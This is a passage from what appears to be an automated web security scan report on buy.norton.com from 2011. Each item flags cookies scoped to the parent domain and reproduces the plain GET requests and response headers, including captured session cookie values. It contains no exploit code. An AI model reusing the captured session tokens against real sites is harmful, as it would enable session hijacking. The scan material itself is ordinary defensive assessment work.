Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.6. http://buy.norton.com/estore/mf/landingProductFeatures

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive


<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...

9.7. http://buy.norton.com/estore/mf/landingPromotion

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50623

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 68924

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 73974

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.10. http://buy.norton.com/estore/mf/upgradeCenter

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 137137

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.11. http://buy.norton.com/estore/mf/upgradeRenewal

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41047

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:17 GMT
Pragma: no-cache
Location: http://buy.norton.com/estore/mf/errorProductNotFound
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Content-Language: de-CH
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/er
...[SNIP]...

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Fri, 09 Sep 2011 21:25:51 GMT
Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
Content-Length: 0


9.15. http://buy.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:16 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.16. http://buy.norton.com/ps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /ps

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:23 GMT
